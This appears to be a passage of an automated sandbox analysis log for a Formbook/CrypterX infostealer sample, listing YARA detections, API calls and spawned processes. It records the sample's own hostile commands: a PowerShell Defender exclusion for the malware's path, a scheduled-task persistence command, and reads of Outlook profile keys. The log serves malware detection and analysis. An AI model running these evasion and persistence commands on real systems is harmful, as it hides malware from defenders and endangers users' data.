            Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe.2eb0724.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
            Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe.2e92f54.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
            Source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000002.501723041.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe PID: 5616, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: FqJXaFxwEj.exe PID: 4460, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: cmd.exe PID: 3628, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: String function: 01B95720 appears 85 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: String function: 01B5D08C appears 48 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: String function: 01B0B150 appears 177 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B496E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B499A0 NtCreateSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B499D0 NtCreateProcessEx,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49910 NtAdjustPrivilegesToken,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49950 NtQueueApcThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B498A0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B498F0 NtReadVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49820 NtEnumerateKey,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49840 NtDelayExecution,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B4B040 NtSuspendThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B4A3B0 NtGetContextThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49B00 NtSetValueKey,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49A80 NtOpenDirectoryObject,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49A20 NtResumeThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49A10 NtQuerySection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49A00 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49A50 NtCreateFile,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B495F0 NtQueryInformationFile,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B495D0 NtClose,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B4AD30 NtSetContextThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49520 NtWaitForSingleObject,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49560 NtWriteFile,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49540 NtReadFile,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B497A0 NtUnmapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49780 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49FE0 NtCreateMutant,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49730 NtQueryVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49710 NtQueryInformationToken,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B4A710 NtOpenProcessToken,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49770 NtSetInformationFile,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B4A770 NtOpenThread,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49760 NtOpenProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B496D0 NtCreateKey,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49610 NtEnumerateValueKey,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49670 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_01B49650 NtQueryValueKey,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_0041E047 NtReadFile,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_0041E0C7 NtClose,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_0041E177 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_004012A3 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_0041DF97 NtCreateFile,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_0041E042 NtReadFile,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_0041E0C1 NtClose,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_0041E173 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Code function: 9_2_004014E9 NtProtectVirtualMemory,
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.359675878.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamePrecision.dll6 vs SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.359675878.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameInspector.dllN vs SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000000.308286342.0000000000A42000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenamenXwV.exeB vs SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.366984387.0000000007650000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameCollins.dll8 vs SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000003.360162279.0000000001A69000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000003.357988306.00000000018BD000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000002.362197036.0000000001BFF000.00000040.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Binary or memory string: OriginalFilenamenXwV.exeB vs SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: FqJXaFxwEj.exe.0.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, ReversingLabs: Detection: 29%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown, Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp4724.tmp
            Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown, Process created: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe, Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp8C7A.tmp
            Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe, Process created: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe, Process created: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
            Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeFile created: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeFile created: C:\Users\user\AppData\Local\Temp\tmp4724.tmp
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/12@2/1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeFile read: C:\Users\user\Desktop\desktop.ini
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000000.308136610.0000000000962000.00000002.00000001.01000000.00000003.sdmp, FqJXaFxwEj.exe.0.drBinary or memory string: insert into User_Transportation(UserID,TransportationID) values (@UserID,@TransID);
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000000.308136610.0000000000962000.00000002.00000001.01000000.00000003.sdmp, FqJXaFxwEj.exe.0.drBinary or memory string: insert into TourPlace(Name,Location,TicketPrice) values (@name,@location,@ticket);
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000000.308136610.0000000000962000.00000002.00000001.01000000.00000003.sdmp, FqJXaFxwEj.exe.0.drBinary or memory string: insert into User_TourPlace(UserID,TourPlaceID) values (@UserID,@TourplaceID);
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5212:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1028:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3216:120:WilError_01
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeMutant created: \Sessions\1\BaseNamedObjects\FgAniyuUJLIlHUpU
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5072:120:WilError_01
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeString found in binary or memory: AddUserButton'AddUserPhoneTextbox'AdduserEmailtextbox-Adduserpasswordtextbox
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeString found in binary or memory: Username:-AddusertextBoxUsernameCash
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\cmd.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000003.359410400.000000000194A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000002.361323624.0000000001AE0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000003.355211610.00000000017A7000.00000004.00000800.00020000.00000000.sdmp, FqJXaFxwEj.exe, 0000000D.00000002.501948554.0000000001950000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.504620671.0000000003588000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.578060777.0000000003720000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.501310955.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.581625002.000000000383F000.00000040.00000800.00020000.00000000.sdmp
